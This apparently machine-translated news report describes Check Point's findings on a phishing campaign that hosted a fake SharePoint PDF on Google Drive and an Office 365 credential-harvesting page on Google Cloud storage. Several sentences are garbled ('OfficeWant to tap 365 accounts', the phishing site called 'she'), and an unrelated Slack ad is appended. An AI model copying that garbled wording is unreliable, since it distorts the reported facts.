Phishing campaign uses Google's cloud services to steal Office 365 credentials

The hackers host a specially designed PDF file on Google Drive. The Google Cloud also provides a phishing website for the attack. Similar attacks also abuse cloud services from other providers such as Microsoft Azur.

A current phishing campaign hosts specially designed documents on Google’s cloud services that cybercriminals use to log in to OfficeWant to tap 365 accounts. In doing so, they are following the trend of storing fake documents and websites on public cloud servers instead of keeping them available to their own or rented servers.

Phishing (Image: Shutterstock)According to Bleeping Computer, Check Point researchers have now described an attack in which the hackers attacked Google Drive left to spread a malicious PDF document. They also hosted their phishing website on Google’s “storage.googleapis.com”.

The PDF file was designed as if it served as access to content that was available on Microsoft’s SharePoint platform. A victim who clicked on the “Access Document” link ended up on the phishing website hosted in the Google Cloud. She asked the user to enter their Office 365 credentials.

According to Check Point, the attack was difficult for users to identify because all of the resources used came from legitimate sources. A further development of the attack method also uses the Google service Cloud Functions, which allows code to be executed in the cloud. The attackers could even disguise the origin of the content required for the phishing site.

Without the cloud functions, the researchers found a domain of the attackers in the code of the phishing site, which in turn should belong to an IP address in Ukraine. This allowed them to connect to hackers’ activities from 2018 when they were still hosting their phishing sites directly on a malicious domain. Then they switched to Microsoft Azure before they ended up on Google’s cloud offerings.

Google has since removed the content in question from its server. “Google investigates phishing sites and locks them out when we see them through Safe Browsing data feeds and other direct reports,” the company said.

Collaboration platform Slack: work efficiently – no matter where

Before COVID-19, remote work was almost unthinkable for many companies. Today they realized that it can work very well if the general conditions are right. Find out in this webinar how you can optimally react to changing working conditions with the Slack collaboration solution.

Leave a Reply

Your email address will not be published. Required fields are marked *